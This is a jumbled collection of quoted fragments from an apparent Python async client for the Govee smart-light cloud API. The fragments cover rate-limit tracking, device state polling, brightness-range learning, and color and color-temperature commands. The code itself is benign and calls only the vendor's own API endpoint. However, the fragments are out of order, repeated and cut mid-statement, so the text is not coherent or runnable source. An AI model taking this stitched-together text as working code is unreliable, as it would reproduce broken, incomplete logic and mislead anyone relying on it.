range 0 .. 254\" else: if brightness > 0 and device.before_set_brightness_turn_on: await", "> 0: brightness_set_100 = max(1, math.floor(brightness * 100 / 254)) brightness_result_100 = math.ceil(brightness_set_100", "changed = False # init Dict and entry for device if learning_infos ==", "{self._limit} remaining, sleeping for {sleep_sec}s.\" ) await asyncio.sleep(sleep_sec) @property def rate_limit_total(self): \"\"\"Rate limit", "self._learn(device) if not err: success = self._is_success_result_message(result) if success: self._devices[device_str].timestamp = self._utcnow self._devices[device_str].source", "client package.\"\"\" import asyncio import logging import time import math from contextlib import", "elif blue < 0 or blue > 255: err = f\"set_color: invalid value", "_track_rate_limit(self, response): \"\"\"Track rate limiting.\"\"\" if response.status == 429: _LOGGER.warning( f\"Rate limit exceeded,", "err = f\"Invalid device {device_str}, {device}\" else: if color_temp < 2000 or color_temp", "load learned/configured values if device_str in learning_infos: learning_info = learning_infos[device_str] learned_set_brightness_max = learning_info.set_brightness_max", "result, err = await self._control(device, command, color_temp) if not err: success = self._is_success_result_message(result)", "import asynccontextmanager from dataclasses import dataclass from datetime import datetime from events import", "called by turn_on and turn_off.\"\"\" success = False err = None device_str, device", "red must be within 0 .. 254\" ) elif green < 0 or", ") if prop_brightness > 100: device.learned_get_brightness_max = 254 await self._learn(device) if device.learned_get_brightness_max ==", "config_offline_is_off = False # effenctive state # defaults by some conditions if not", "return self._config_offline_is_off @config_offline_is_off.setter def config_offline_is_off(self, val: bool): \"\"\" Set global behavour when device", "learn if ( learning_infos[device.device].set_brightness_max != device.learned_set_brightness_max ): _LOGGER.debug( \"learned device %s uses range", "str lock_set_until: int lock_get_until: int learned_set_brightness_max: int learned_get_brightness_max: int before_set_brightness_turn_on: bool config_offline_is_off: bool", "2000-9000.\"\"\" success = False err = None device_str, device = self._get_device(device) if not", "GoveeLearnedInfo, ) _LOGGER = logging.getLogger(__name__) _API_BASE_URL = \"https://developer-api.govee.com\" _API_PING = _API_BASE_URL + \"/ping\"", "result.brightness = prop_brightness result.color = prop_color result.color_temp = prop_color_temp result.timestamp = timestamp result.source", "self._devices: device = None # disallow unknown devices elif isinstance(device, str) and device_str", "learning storage as long as we run. # we will need to re-learn", "\"/ping\" _API_DEVICES = _API_BASE_URL + \"/v1/devices\" _API_DEVICES_CONTROL = _API_BASE_URL + \"/v1/devices/control\" _API_DEVICES_STATE =", "are all dicts with one element if \"online\" in prop: prop_online = prop[\"online\"]", "bool retrievable: bool support_cmds: List[str] support_turn: bool support_brightness: bool support_color: bool support_color_tem: bool", "def _turn( self, device: Union[str, GoveeDevice], onOff: str ) -> Tuple[bool, str]: \"\"\"Turn", "= self._get_lock_seconds(device.lock_set_until) if not seconds_locked: break; _LOGGER.debug(f\"control {device_str} is locked for {seconds_locked} seconds.", "prop[\"powerState\"] == \"on\" elif \"brightness\" in prop: prop_brightness = prop[\"brightness\"] elif \"color\" in", "self._devices[device_str] elif seconds_locked: # we just changed something, return state from history self._devices[device_str].source", "brightness as 0..100 brightness_set = brightness_set_100 brightness_result = brightness_result_100 command = \"brightness\" result,", "in the current rate limit window. _RATELIMIT_RESET = \"Rate-Limit-Reset\" # The time at", "def turn_off(self, device: Union[str, GoveeDevice]) -> Tuple[bool, str]: \"\"\"Turn off a device, return", "asyncio.sleep(sleep_sec) @property def rate_limit_total(self): \"\"\"Rate limit is counted down from this value.\"\"\" return", "Exception as ex: _LOGGER.warning(f\"Error trying to get rate limits: {ex}\") if limit_unknown: self._limit_remaining", "None err = None async with self._api_get(url=_API_PING, auth=False) as response: result = await", "= {\"name\": command, \"value\": params} _LOGGER.debug(f\"control {device_str}: {cmd}\") result = None err =", "_LOGGER.debug(f\"control {device_str} is locked for {seconds_locked} seconds. Command waiting: {cmd}\") await asyncio.sleep(seconds_locked) json", "err = f\"Invalid device {device_str}, {device}\" else: if not device.controllable: err = f\"Device", "asynccontextmanager from dataclasses import dataclass from datetime import datetime from events import Events", "brightness to 0-254.\"\"\" success = False err = None device_str, device = self._get_device(device)", "else: command = \"turn\" params = onOff result, err = await self._control(device, command,", "prop[\"colorTemInKelvin\"] else: _LOGGER.debug(f\"unknown state property '{prop}'\") if not prop_online: if self.config_offline_is_off is not", "\"on\" elif \"brightness\" in prop: prop_brightness = prop[\"brightness\"] elif \"color\" in prop: prop_color", "without an async context manager.\"\"\" self = Govee(api_key, learning_storage=learning_storage) await self.__aenter__() return self", "else: self._devices[device_str] = state self._devices[device_str].error = None return self.devices async def _get_device_state( self,", "math.ceil(brightness_set_100 * 254 / 100) if device.learned_set_brightness_max == 100: # set brightness as", "@rate_limit_on.setter def rate_limit_on(self, val): \"\"\"Set the remaining calls that trigger rate limiting.\"\"\" if", "* 100 / 254)) brightness_result_100 = math.ceil(brightness_set_100 * 254 / 100) if device.learned_set_brightness_max", "async def _api_put(self, *, auth=True, url: str, json): \"\"\"API HTTP Put call.\"\"\" async", "None await self.rate_limit_delay() try: async with request_lambda() as response: self._set_online(True) # we got", "assumed. If the brightness slider doesn't match the actual brightness pull the brightness", "not device.retrievable: # device {device_str} isn't able to return state, return 'history' state", "# init Dict and entry for device if learning_infos == None: learning_infos =", "err = await self._get_device_state(device_str) if err: _LOGGER.warning(\"error getting state for device %s: %s\",", "= \"turn\" params = onOff result, err = await self._control(device, command, params) success", "within 0 .. 254\" ) elif green < 0 or green > 255:", "datetime.timestamp(datetime.now()) def _track_rate_limit(self, response): \"\"\"Track rate limiting.\"\"\" if response.status == 429: _LOGGER.warning( f\"Rate", "self._err_msg = err_msg status = -1 async def text(self): return self._err_msg yield error_response(\"_api_request_internal:", "self._get_lock_seconds(device.lock_set_until) if not seconds_locked: break; _LOGGER.debug(f\"control {device_str} is locked for {seconds_locked} seconds. Command", "in json_obj[\"data\"][\"properties\"]: # somehow these are all dicts with one element if \"online\"", "== \"on\" return success, err async def set_brightness( self, device: Union[str, GoveeDevice], brightness:", "str, json): \"\"\"API HTTP Put call.\"\"\" async with self._api_request_internal( lambda: self._session.put( url=url, headers=self._getHeaders(auth),", "not err: device.learned_set_brightness_max = 100 await self._learn(device) else: if brightness_set > 100: device.learned_set_brightness_max", "what was lerned, and learn if ( learning_infos[device.device].set_brightness_max != device.learned_set_brightness_max ): _LOGGER.debug( \"learned", "_API_DEVICES_STATE = _API_BASE_URL + \"/v1/devices/state\" # API rate limit header keys _RATELIMIT_TOTAL =", "if response.status == 200: result = await response.json() timestamp = self._utcnow() learning_infos =", "= None async with self._api_get(url=_API_DEVICES) as response: if response.status == 200: result =", "-= 1 async def rate_limit_delay(self): \"\"\"Delay a call when rate limiting is active.\"\"\"", "limiting active, {self._limit_remaining} of {self._limit} remaining, sleeping for {sleep_sec}s.\" ) await asyncio.sleep(sleep_sec) @property", "self.rate_limit_delay() try: async with request_lambda() as response: self._set_online(True) # we got something, so", "= self._utcnow self._devices[device_str].source = \"history\" self._devices[device_str].power_state = onOff == \"on\" return success, err", "-> List[GoveeDevice]: \"\"\"Request states for all devices from API.\"\"\" _LOGGER.debug(\"get_states\") for device_str in", "an offline device doesn't change power state. True: an offline device is shown", "if device.device not in learning_infos: learning_infos[device.device] = GoveeLearnedInfo() # output what was lerned,", "_turn( self, device: Union[str, GoveeDevice], onOff: str ) -> Tuple[bool, str]: \"\"\"Turn command", "that trigger rate limiting. Defaults to 5, which means there is some room", "< 0: seconds_lock = 0 return seconds_lock async def _control( self, device: Union[str,", "is offline. None: default, use config_offline_is_off from learning, or False by default. False:", "for device in self.devices: device.online = False async def check_connection(self) -> bool: \"\"\"Check", ".. 254\" else: command = \"color\" command_color = {\"r\": red, \"g\": green, \"b\":", "limit is counted down from this value.\"\"\" return self._limit @property def rate_limit_remaining(self): \"\"\"Remaining", "as response: self._set_online(True) # we got something, so we are online self._track_rate_limit(response) #", "if prop_brightness > 100: device.learned_get_brightness_max = 254 await self._learn(device) if device.learned_get_brightness_max == 100:", "calls that trigger rate limiting. Defaults to 5, which means there is some", "offline. None: default, use config_offline_is_off from learning, or False by default. False: an", "self._devices: device = self._devices[device_str] else: raise GoveeDeviceNotFound(device_str) return device_str, device def _is_success_result_message(self, result)", "= await self._control(device, command, brightness_set) if err: # try again with 0-100 range", "True if ( learning_infos[device.device].get_brightness_max != device.learned_get_brightness_max ): _LOGGER.debug( \"learned device %s uses range", "self._session = aiohttp.ClientSession() return self async def __aexit__(self, *err): \"\"\"Async context manager exit.\"\"\"", "%s\" % repr(ex) if err: class error_response: def __init__(self, err_msg): self._err_msg = err_msg", "for setting brightness.\", device.device, device.learned_set_brightness_max, ) learning_infos[ device.device ].set_brightness_max = device.learned_set_brightness_max changed =", "assume we are online self.events = Events() self._api_key = api_key self._devices = {}", "GoveeDevice], command: str, params: Any ) -> Tuple[Any, str]: \"\"\"Control led strips and", "prop_power_state = False # autobrightness learning if device.learned_get_brightness_max == None or ( device.learned_get_brightness_max", "= True # load learned/configured values if device_str in learning_infos: learning_info = learning_infos[device_str]", "seconds_locked: # we just changed something, return state from history self._devices[device_str].source = \"history\"", "in seconds when the rate limit will be reset.\"\"\" return self._limit_reset @property def", "async with self._api_request_internal( lambda: self._session.put( url=url, headers=self._getHeaders(auth), json=json ) ) as response: yield", "device = None # disallow unknown devices elif isinstance(device, str) and device_str in", "if not device: err = f\"Invalid device {device_str}, {device}\" else: if color_temp <", "permitted to make per minute. _RATELIMIT_REMAINING = \"Rate-Limit-Remaining\" # The number of requests", "off. \"\"\" self._config_offline_is_off = val @property def devices(self) -> List[GoveeDevice]: \"\"\"Cached devices list.\"\"\"", "_API_DEVICES_CONTROL = _API_BASE_URL + \"/v1/devices/control\" _API_DEVICES_STATE = _API_BASE_URL + \"/v1/devices/state\" # API rate", "Methond handling all HTTP calls. This also handles: - rate-limiting - online/offline status", "inform about state change self.events.online(self._online) if not online: # show all devices as", "async def _api_request_internal(self, request_lambda): \"\"\"API Methond handling all HTTP calls. This also handles:", "limiter threshold {val} must be below {self._limit}\" ) if val < 1: raise", "\"off\") async def _turn( self, device: Union[str, GoveeDevice], onOff: str ) -> Tuple[bool,", "result.timestamp = timestamp result.source = \"api\" result.error = None _LOGGER.debug( f\"state returned from", "not device_str in self._devices: device = None # disallow unknown devices elif isinstance(device,", "prop[\"online\"] is True elif \"powerState\" in prop: prop_power_state = prop[\"powerState\"] == \"on\" elif", "global config option config_offline_is_off.\"\"\" return self._config_offline_is_off @config_offline_is_off.setter def config_offline_is_off(self, val: bool): \"\"\" Set", "to the API.\"\"\" return self._online def _set_online(self, online: bool): \"\"\"Set the online state", "context manager exit.\"\"\" if self._session: await self._session.close() self._session = None def __init__( self,", "prop_power_state = prop[\"powerState\"] == \"on\" elif \"brightness\" in prop: prop_brightness = prop[\"brightness\"] elif", "per minute. _RATELIMIT_REMAINING = \"Rate-Limit-Remaining\" # The number of requests remaining in the", "+ DELAY_GET_FOLLOWING_SET_SECONDS ) result = await response.json() else: text = await response.text() err", "\"color\" command_color = {\"r\": red, \"g\": green, \"b\": blue} result, err = await", "def _getHeaders(self, auth: bool): \"\"\"Return Request headers with/without authentication.\"\"\" if auth: return {\"Govee-API-Key\":", "that trigger rate limiting.\"\"\" if val > self._limit: raise GoveeError( f\"Rate limiter threshold", "params=params) as response: if response.status == 200: timestamp = self._utcnow() json_obj = await", "we didn't get anything higher ) if prop_brightness > 100: device.learned_get_brightness_max = 254", "# assuming defaults for learned/configured values learned_set_brightness_max = None learned_get_brightness_max = None before_set_brightness_turn_on", "return success, err async def set_color( self, device: Union[str, GoveeDevice], color: Tuple[int, int,", "learning_info.before_set_brightness_turn_on config_offline_is_off = learning_info.config_offline_is_off # create device DTO devices[device_str] = GoveeDevice( device=device_str, model=model_str,", "List[GoveeDevice]: \"\"\"Cached devices list.\"\"\" lst = [] for dev in self._devices: lst.append(self._devices[dev]) return", "_LOGGER.warning(f\"control {device_str} not possible: {err}\") return result, err async def get_states(self) -> List[GoveeDevice]:", "devices.\"\"\" _LOGGER.debug(\"get_devices\") devices = {} err = None async with self._api_get(url=_API_DEVICES) as response:", "not seconds_locked: break; _LOGGER.debug(f\"control {device_str} is locked for {seconds_locked} seconds. Command waiting: {cmd}\")", "= float(response.headers[_RATELIMIT_RESET]) _LOGGER.debug( f\"Rate limit total: {self._limit}, remaining: {self._limit_remaining} in {self.rate_limit_reset_seconds} seconds\" )", "will be reset.\"\"\" return self._limit_reset - self._utcnow() @property def rate_limit_on(self): \"\"\"Remaining calls that", "not possible on device {device.device}\" _LOGGER.warning(f\"control {device_str} not possible: {err}\") else: while True:", "{\"Govee-API-Key\": self._api_key} return {} @asynccontextmanager async def _api_put(self, *, auth=True, url: str, json):", "for dev in self._devices: lst.append(self._devices[dev]) return lst def device(self, device) -> GoveeDevice: \"\"\"Single", "= False err = None device_str, device = self._get_device(device) if not device: err", "This also handles: - rate-limiting - online/offline status \"\"\" err = None await", "HTTP calls. This also handles: - rate-limiting - online/offline status \"\"\" err =", "err = f\"set_color: invalid value {color}, must be tuple with (r, g, b)", "class GoveeDevice(object): \"\"\" Govee Device DTO \"\"\" device: str model: str device_name: str", "api endpoint. No API_KEY is needed.\"\"\" _LOGGER.debug(\"ping\") start = time.time() ping_ok_delay = None", "else: if brightness > 0 and device.before_set_brightness_turn_on: await self.turn_on(device) # api doesn't work", "brightness_set_100 brightness_result = brightness_result_100 result, err = await self._control( device, command, brightness_set )", "int learned_get_brightness_max: int before_set_brightness_turn_on: bool config_offline_is_off: bool # this is the learning config,", "change.\"\"\" if self._online != online: self._online = online # inform about state change", "\"\"\"Seconds until the rate limit will be reset.\"\"\" return self._limit_reset - self._utcnow() @property", "response.status == 200: if \"Pong\" == result: ping_ok_delay = max(1, delay) else: err", "if device.learned_get_brightness_max == None or ( device.learned_get_brightness_max == 100 and prop_brightness > 100", "\"Rate-Limit-Reset\" # The time at which the current rate limit window resets in", "await self.rate_limit_delay() async with self._api_put( url=_API_DEVICES_CONTROL, json=json ) as response: if response.status ==", "0..100 brightness_set = brightness_set_100 brightness_result = brightness_result_100 command = \"brightness\" result, err =", "0 self._config_offline_is_off = None self._learning_storage = learning_storage if not self._learning_storage: # use an", "return self._limit_reset @property def rate_limit_reset_seconds(self): \"\"\"Seconds until the rate limit will be reset.\"\"\"", "learning_infos[ device.device ].get_brightness_max = device.learned_get_brightness_max if changed: await self._learning_storage._write_cached(learning_infos) async def set_color_temp( self,", "device @property def online(self): \"\"\"Last request was able to connect to the API.\"\"\"", "if we don't sleep await asyncio.sleep(1) # set brightness as 0..254 brightness_set =", "self._learn(device) if device.learned_get_brightness_max == 100: # scale range 0-100 up to 0-254 prop_brightness", "self._devices[device_str].brightness = brightness_result self._devices[device_str].power_state = brightness_result > 0 return success, err async def", "as response: if response.status == 200: result = await response.json() timestamp = self._utcnow()", "onOff result, err = await self._control(device, command, params) success = False if not", "device.learned_set_brightness_max changed = True if ( learning_infos[device.device].get_brightness_max != device.learned_get_brightness_max ): _LOGGER.debug( \"learned device", "sleep? sleep_sec = self.rate_limit_reset_seconds if sleep_sec > 0: _LOGGER.warning( f\"Rate limiting active, {self._limit_remaining}", "err async def set_brightness( self, device: Union[str, GoveeDevice], brightness: int ) -> Tuple[bool,", "behavour when device is offline. None: default, use config_offline_is_off from learning, or False", "with the Client without using an async context manager.\"\"\" await self.__aexit__() def _getHeaders(self,", "= \"api\" result.error = None _LOGGER.debug( f\"state returned from API: {json_obj}, resulting state", "else: params = {\"device\": device.device, \"model\": device.model} async with self._api_get(url=_API_DEVICES_STATE, params=params) as response:", "in prop: prop_online = prop[\"online\"] is True elif \"powerState\" in prop: prop_power_state =", "= None await self.rate_limit_delay() try: async with request_lambda() as response: self._set_online(True) # we", "and learn if ( learning_infos[device.device].set_brightness_max != device.learned_set_brightness_max ): _LOGGER.debug( \"learned device %s uses", "= -1 async def text(self): return self._err_msg yield error_response(\"_api_request_internal: \" + err) def", "check if other devices also utilize the govee API\" ) limit_unknown = True", "self._api_get(url=_API_DEVICES_STATE, params=params) as response: if response.status == 200: timestamp = self._utcnow() json_obj =", "( 100 # assumption, as we didn't get anything higher ) if prop_brightness", "_LOGGER.debug(f\"control {device_str}: {cmd}\") result = None err = None if not device: err", "Device DTO \"\"\" device: str model: str device_name: str controllable: bool retrievable: bool", "values learned_set_brightness_max = None learned_get_brightness_max = None before_set_brightness_turn_on = False config_offline_is_off = False", "brightness pull the brightness up to max once.\", device.device, ) changed = True", "{result}\" # cache last get_devices result self._devices = devices return self.devices, err def", "= {} err = None async with self._api_get(url=_API_DEVICES) as response: if response.status ==", "f\"Rate limit exceeded, check if other devices also utilize the govee API\" )", "= None before_set_brightness_turn_on = False config_offline_is_off = False # effenctive state # defaults", "{color}, must be tuple with (r, g, b) values\" else: red = color[0]", "device.lock_set_until = ( self._utcnow() + DELAY_SET_FOLLOWING_SET_SECONDS ) device.lock_get_until = ( self._utcnow() + DELAY_GET_FOLLOWING_SET_SECONDS", "self._learning_storage._read_cached() for item in result[\"data\"][\"devices\"]: device_str = item[\"device\"] model_str = item[\"model\"] is_retrievable =", "b) where each value may be in range 0-255 \"\"\" success = False", "await response.text() err = f\"API-Error {response.status}: {result}\" # cache last get_devices result self._devices", "self._devices[device_str].timestamp = self._utcnow self._devices[device_str].source = \"history\" self._devices[device_str].color_temp = color_temp return success, err async", "# global option if self.config_offline_is_off: prop_power_state = False elif device.config_offline_is_off: # learning option", "str model: str device_name: str controllable: bool retrievable: bool support_cmds: List[str] support_turn: bool", "brightness_result_100 result, err = await self._control( device, command, brightness_set ) if not err:", "devices as offline for device in self.devices: device.online = False async def check_connection(self)", "json=json ) as response: if response.status == 200: device.lock_set_until = ( self._utcnow() +", "255: err = f\"set_color: invalid value {color}, blue must be within 0 ..", "-1 if model_str == \"H6104\": before_set_brightness_turn_on = True # load learned/configured values if", "API.\"\"\" try: # this will set self.online await self.ping() except: pass return self.online", "from datetime import datetime from events import Events from typing import Any, List,", "\"\"\"Turn command called by turn_on and turn_off.\"\"\" success = False err = None", "0: seconds_lock = 0 return seconds_lock async def _control( self, device: Union[str, GoveeDevice],", "ping_ok_delay = None err = None async with self._api_get(url=_API_PING, auth=False) as response: result", "device): \"\"\"Persist learned information from device DTO.\"\"\" learning_infos: Dict[ str, GoveeLearnedInfo ] =", "devices list.\"\"\" lst = [] for dev in self._devices: lst.append(self._devices[dev]) return lst def", "learning_infos == None: learning_infos = {} if device.device not in learning_infos: learning_infos[device.device] =", "keys _RATELIMIT_TOTAL = \"Rate-Limit-Total\" # The maximum number of requests you're permitted to", "def create( cls, api_key: str, *, learning_storage: Optional[GoveeAbstractLearningStorage] = None, ): \"\"\"Use create", "if ( learning_infos[device.device].get_brightness_max != device.learned_get_brightness_max ): _LOGGER.debug( \"learned device %s uses range 0-%s", "if not is_retrievable: learned_get_brightness_max = -1 if model_str == \"H6104\": before_set_brightness_turn_on = True", "logging import time import math from contextlib import asynccontextmanager from dataclasses import dataclass", "from this value.\"\"\" return self._limit @property def rate_limit_remaining(self): \"\"\"Remaining Rate limit.\"\"\" return self._limit_remaining", "brightness_set_100 brightness_result = brightness_result_100 command = \"brightness\" result, err = await self._control(device, command,", "brightness: int color: Tuple[int, int, int] color_temp: int timestamp: int source: str error:", "Tuple[str, GoveeDevice]: \"\"\"Get a device by address or GoveeDevice DTO. returns: device_address, device_dto", "= f\"Invalid device {device_str}, {device}\" else: if color_temp < 2000 or color_temp >", "success = False if not err: success = self._is_success_result_message(result) if success: self._devices[device_str].timestamp =", "learning if device.learned_get_brightness_max == None or ( device.learned_get_brightness_max == 100 and prop_brightness >", "learning_storage: Optional[GoveeAbstractLearningStorage] = None, ): \"\"\"Init with an API_KEY and storage for learned", "None, ): \"\"\"Init with an API_KEY and storage for learned values.\"\"\" _LOGGER.debug(\"govee_api_laggat v%s\",", "in prop: prop_color = ( prop[\"color\"][\"r\"], prop[\"color\"][\"g\"], prop[\"color\"][\"b\"], ) elif \"colorTemInKelvin\" in prop:", "Govee Device DTO \"\"\" device: str model: str device_name: str controllable: bool retrievable:", ") elif green < 0 or green > 255: err = f\"set_color: invalid", "{result}\" else: result = await response.text() err = f\"API-Error {response.status}: {result}\" return ping_ok_delay,", "0-100 range if \"API-Error 400\" in err: # Unsupported Cmd Value # set", "await response.text() err = f\"API-Error {response.status}: {result}\" return ping_ok_delay, err async def get_devices(self)", "self._devices[device_str].source = \"history\" result = self._devices[device_str] elif seconds_locked: # we just changed something,", "item in result[\"data\"][\"devices\"]: device_str = item[\"device\"] model_str = item[\"model\"] is_retrievable = item[\"retrievable\"] #", "= onOff == \"on\" return success, err async def set_brightness( self, device: Union[str,", "check_connection(self) -> bool: \"\"\"Check connection to API.\"\"\" try: # this will set self.online", "was lerned, and learn if ( learning_infos[device.device].set_brightness_max != device.learned_set_brightness_max ): _LOGGER.debug( \"learned device", "self._get_device(device) result = None err = None seconds_locked = self._get_lock_seconds(device.lock_get_until) if not device:", "object: {result}\" ) else: errText = await response.text() err = f\"API-Error {response.status}: {errText}\"", "seconds. # return state from hisory for n seconds after controlling the device", "The time at which the current rate limit window resets in UTC epoch", "we will need to re-learn every time again. self._learning_storage = GoveeAbstractLearningStorage() @classmethod async", "pass return self.online async def ping(self) -> Tuple[float, str]: \"\"\"Ping the api endpoint.", "every time again. self._learning_storage = GoveeAbstractLearningStorage() @classmethod async def create( cls, api_key: str,", "self._learning_storage._write_cached(learning_infos) async def set_color_temp( self, device: Union[str, GoveeDevice], color_temp: int ) -> Tuple[bool,", "/ 100) if device.learned_set_brightness_max == 100: # set brightness as 0..100 brightness_set =", "err = \"unknown error: %s\" % repr(ex) if err: class error_response: def __init__(self,", "DELAY_SET_FOLLOWING_SET_SECONDS = 1 @dataclass class GoveeDevice(object): \"\"\" Govee Device DTO \"\"\" device: str", "def __aexit__(self, *err): \"\"\"Async context manager exit.\"\"\" if self._session: await self._session.close() self._session =", "so we are online self._track_rate_limit(response) # return the async content manager response yield", "color_temp < 2000 or color_temp > 9000: err = f\"set_color_temp: invalid value {color_temp},", "_LOGGER.debug(\"get_states\") for device_str in self._devices: state, err = await self._get_device_state(device_str) if err: _LOGGER.warning(\"error", "model: str device_name: str controllable: bool retrievable: bool support_cmds: List[str] support_turn: bool support_brightness:", "self._is_success_result_message(result) if success: self._devices[device_str].timestamp = self._utcnow self._devices[device_str].source = \"history\" self._devices[device_str].power_state = onOff ==", "device.device, device.learned_set_brightness_max, ) learning_infos[ device.device ].set_brightness_max = device.learned_set_brightness_max changed = True if (", "once.\", device.device, ) changed = True learning_infos[ device.device ].get_brightness_max = device.learned_get_brightness_max if changed:", "/ 100 ) result = self._devices[device_str] result.online = prop_online result.power_state = prop_power_state result.brightness", "learned_get_brightness_max: int before_set_brightness_turn_on: bool config_offline_is_off: bool # this is the learning config, possibly", "controllable=item[\"controllable\"], retrievable=is_retrievable, support_cmds=item[\"supportCmds\"], support_turn=\"turn\" in item[\"supportCmds\"], support_brightness=\"brightness\" in item[\"supportCmds\"], support_color=\"color\" in item[\"supportCmds\"], support_color_tem=\"colorTem\"", "after controlling the device DELAY_GET_FOLLOWING_SET_SECONDS = 2 # do not send another control", "None seconds_locked = self._get_lock_seconds(device.lock_get_until) if not device: err = f\"Invalid device {device_str}\" elif", "are offline self._set_online(False) err = \"error from aiohttp: %s\" % repr(ex) except Exception", "turn_on and turn_off.\"\"\" success = False err = None device_str, device = self._get_device(device)", "= await self._get_device_state(device_str) if err: _LOGGER.warning(\"error getting state for device %s: %s\", device_str,", "None return self.devices async def _get_device_state( self, device: Union[str, GoveeDevice] ) -> Tuple[GoveeDevice,", "import asyncio import logging import time import math from contextlib import asynccontextmanager from", "self._get_device(device) if not device: err = f\"Invalid device {device_str}, {device}\" else: if brightness", "else: if color_temp < 2000 or color_temp > 9000: err = f\"set_color_temp: invalid", "for {device.device} from api allowed in {seconds_locked} seconds\" ) else: params = {\"device\":", "prop_brightness result.color = prop_color result.color_temp = prop_color_temp result.timestamp = timestamp result.source = \"api\"", "yield response @asynccontextmanager async def _api_get(self, *, auth=True, url: str, params=None): \"\"\"API HTTP", "\"Rate-Limit-Total\" # The maximum number of requests you're permitted to make per minute.", "{err}\") elif not command in device.support_cmds: err = f\"Command {command} not possible on", "err = await self._control(device, command, color_temp) if not err: success = self._is_success_result_message(result) if", "async def set_brightness( self, device: Union[str, GoveeDevice], brightness: int ) -> Tuple[bool, str]:", "\"b\": blue} result, err = await self._control(device, command, command_color) if not err: success", "str, *, learning_storage: Optional[GoveeAbstractLearningStorage] = None, ): \"\"\"Use create method if you want", "\"\"\"Govee API client.\"\"\" async def __aenter__(self): \"\"\"Async context manager enter.\"\"\" self._session = aiohttp.ClientSession()", "str]: \"\"\"Get state for one specific device.\"\"\" device_str, device = self._get_device(device) result =", "possible: {err}\") else: while True: seconds_locked = self._get_lock_seconds(device.lock_set_until) if not seconds_locked: break; _LOGGER.debug(f\"control", "= item[\"retrievable\"] # assuming defaults for learned/configured values learned_set_brightness_max = None learned_get_brightness_max =", "range 2000-9000\" else: command = \"colorTem\" result, err = await self._control(device, command, color_temp)", "device is shown as off. \"\"\" self._config_offline_is_off = val @property def devices(self) ->", "response.text() err = f\"API-Error {response.status}: {result}\" return ping_ok_delay, err async def get_devices(self) ->", "return lst def device(self, device) -> GoveeDevice: \"\"\"Single device from cache.\"\"\" _, device", "isinstance(device, str) and device_str in self._devices: device = self._devices[device_str] else: raise GoveeDeviceNotFound(device_str) return", "math.floor( prop_brightness * 254 / 100 ) result = self._devices[device_str] result.online = prop_online", "import Any, List, Optional, Tuple, Union import aiohttp from govee_api_laggat.__version__ import VERSION from", "result = await response.text() err = f\"API-Error {response.status}: {result}\" # cache last get_devices", "== 100: # scale range 0-100 up to 0-254 prop_brightness = math.floor( prop_brightness", "max(1, delay) else: err = f\"API-Result wrong: {result}\" else: result = await response.text()", "GoveeDeviceNotFound(device_str) return device_str, device def _is_success_result_message(self, result) -> bool: \"\"\"Given an aiohttp result", "command, brightness_set) if err: # try again with 0-100 range if \"API-Error 400\"", "api allowed in {seconds_locked} seconds\" ) else: params = {\"device\": device.device, \"model\": device.model}", "uses range 0-%s for setting brightness.\", device.device, device.learned_set_brightness_max, ) learning_infos[ device.device ].set_brightness_max =", "\"\"\"Get state for one specific device.\"\"\" device_str, device = self._get_device(device) result = None", "= False elif device.config_offline_is_off: # learning option prop_power_state = False # autobrightness learning", "threshold {val} must be above 1\") self._rate_limit_on = val @property def config_offline_is_off(self): \"\"\"Get", "{self._limit}\" ) if val < 1: raise GoveeError(f\"Rate limiter threshold {val} must be", "enter.\"\"\" self._session = aiohttp.ClientSession() return self async def __aexit__(self, *err): \"\"\"Async context manager", "as seconds.\"\"\" return datetime.timestamp(datetime.now()) def _track_rate_limit(self, response): \"\"\"Track rate limiting.\"\"\" if response.status ==", "DELAY_GET_FOLLOWING_SET_SECONDS = 2 # do not send another control within n seconds after", "# The number of requests remaining in the current rate limit window. _RATELIMIT_RESET", "!= online: self._online = online # inform about state change self.events.online(self._online) if not", "brightness state.\", device.device, device.learned_get_brightness_max, ) if device.learned_get_brightness_max == 100: _LOGGER.info( \"brightness range for", "after controlling the device DELAY_SET_FOLLOWING_SET_SECONDS = 1 @dataclass class GoveeDevice(object): \"\"\" Govee Device", "for state online=True, power_state=False, brightness=0, color=(0, 0, 0), color_temp=0, timestamp=timestamp, source=\"history\", error=None, lock_set_until=0,", "success, err async def set_brightness( self, device: Union[str, GoveeDevice], brightness: int ) ->", "= self._utcnow self._devices[device_str].source = \"history\" self._devices[device_str].color_temp = color_temp return success, err async def", "100 ): device.learned_get_brightness_max = ( 100 # assumption, as we didn't get anything", "api doesn't work if we don't sleep await asyncio.sleep(1) # set brightness as", "Tuple[bool, str]: \"\"\"Turn on a device, return success and error message.\"\"\" return await", "red > 255: err = ( f\"set_color: invalid value {color}, red must be", "again with 0-100 range if \"API-Error 400\" in err: # Unsupported Cmd Value", "rate-limiting - online/offline status \"\"\" err = None await self.rate_limit_delay() try: async with", "self._utcnow self._devices[device_str].source = \"history\" self._devices[device_str].brightness = brightness_result self._devices[device_str].power_state = brightness_result > 0 return", "if device.learned_set_brightness_max == 100: # set brightness as 0..100 brightness_set = brightness_set_100 brightness_result", "0-254 prop_brightness = math.floor( prop_brightness * 254 / 100 ) result = self._devices[device_str]", "for learned values.\"\"\" _LOGGER.debug(\"govee_api_laggat v%s\", VERSION) self._online = True # assume we are", "cache devices.\"\"\" _LOGGER.debug(\"get_devices\") devices = {} err = None async with self._api_get(url=_API_DEVICES) as", "device: err = f\"Invalid device {device_str}, {device}\" else: if color_temp < 2000 or", "254 / 100 ) result = self._devices[device_str] result.online = prop_online result.power_state = prop_power_state", "scale range 0-100 up to 0-254 prop_brightness = math.floor( prop_brightness * 254 /", "err = f\"API-Error {response.status} on command {cmd}: {text} for device {device}\" _LOGGER.warning(f\"control {device_str}", "online self.events = Events() self._api_key = api_key self._devices = {} self._rate_limit_on = 5", "= learning_infos[device_str] learned_set_brightness_max = learning_info.set_brightness_max learned_get_brightness_max = learning_info.get_brightness_max before_set_brightness_turn_on = learning_info.before_set_brightness_turn_on config_offline_is_off =", "state self._devices[device_str].error = None return self.devices async def _get_device_state( self, device: Union[str, GoveeDevice]", "datetime from events import Events from typing import Any, List, Optional, Tuple, Union", "= math.floor( prop_brightness * 254 / 100 ) result = self._devices[device_str] result.online =", "async def set_color( self, device: Union[str, GoveeDevice], color: Tuple[int, int, int] ) ->", "range if \"API-Error 400\" in err: # Unsupported Cmd Value # set brightness", "class error_response: def __init__(self, err_msg): self._err_msg = err_msg status = -1 async def", "1000) if response.status == 200: if \"Pong\" == result: ping_ok_delay = max(1, delay)", "the api endpoint. No API_KEY is needed.\"\"\" _LOGGER.debug(\"ping\") start = time.time() ping_ok_delay =", "effenctive state # defaults by some conditions if not is_retrievable: 